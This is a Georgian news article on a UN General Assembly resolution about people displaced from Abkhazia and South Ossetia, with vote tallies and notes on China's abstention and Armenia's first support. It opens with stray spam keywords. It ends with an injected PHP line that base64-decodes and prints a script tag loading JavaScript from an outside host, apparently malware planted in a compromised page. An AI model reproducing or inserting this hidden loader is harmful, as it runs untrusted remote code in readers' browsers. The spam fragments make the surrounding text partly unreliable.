celsiusi
ავერსი საქკაბელი

 4 ივნისს, ნიუ-იორკში, გაერო-ს გენერალურმა ასამბლეამ მიიღო საქართველოსა და 63 ქვეყნის მიერ ინიციირებული რეზოლუცია - „აფხაზეთიდან, საქართველო და ცხინვალის რეგიონიდან/სამხრეთ ოსეთი, საქართველო იძულებით გადაადგილებულ პირთა და ლტოლვილთა სტატუსის შესახებ“.

კენჭისყრაში მონაწილეობისგან თავი ჯამში 52-მა ქვეყანამ შეიკავა და შესაბამისად, რეზოლუციას მხარი არ დაუჭირა. მათ შორის ჩინეთმა, რომელთანაც საქართველომ სტრატეგიული პარტნიორობის შესახებ შეთანხმება გასულ წელს გააფორმა. საქართველო აღნიშნულ რეზოლუციას გაერო-ს გენერალურ ასამბლეაზე 2008 წლიდან წარადგენს, თუმცა ჩინეთს მისთვის მხარი არასდროს დაუჭერია.

რეზოლუციის წინააღმდეგ ხმა 9 ქვეყანამ მისცა, ესენია: ბელარუსი, ბურუნდი, კუბა, ჩრდილოეთ კორეა, მალი, ნიკარაგუა, რუსეთი, სირია და ზიმბაბვე.

ამასთან, რეზოლუციის მხარდამჭერი ქვეყნების რაოდენობა სამით გაიზარდა და მას 103-მა ქვეყანამ დაუჭირა მხარი. საგულისხმოა, რომ გაერო-ს გენერალური ასამბლეის 78-ე სესიის ფარგლებში მიღებულ რეზოლუციას პირველად დაუჭირა მხარი სომხეთმა, რომელთანაც სტრატეგიული პარტნიორობის შესახებ მემორანდუმი მიმდინარე წლის დასაწყისში გაფორმდა. რეზოლუციის ახალ მხარდამჭერებს შორის არიან არგენტინა და სამხრეთ აფრიკაც.

რეზოლუცია გმობს რუსეთის მიერ ოკუპირებულ საქართველოს რეგიონებში ძალისმიერი გზით განხორციელებულ დემოგრაფიულ ცვლილებებს, ადასტურებს დევნილთა უფლებას, ეთნიკური კუთვნილების მიუხედავად, დაბრუნდნენ საკუთარ სახლებში ღირსეულად და უსაფრთხოდ და ხაზს უსვამს მათი საკუთრების უფლების პატივისცემისა და დაცვის აუცილებლობას.

165
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");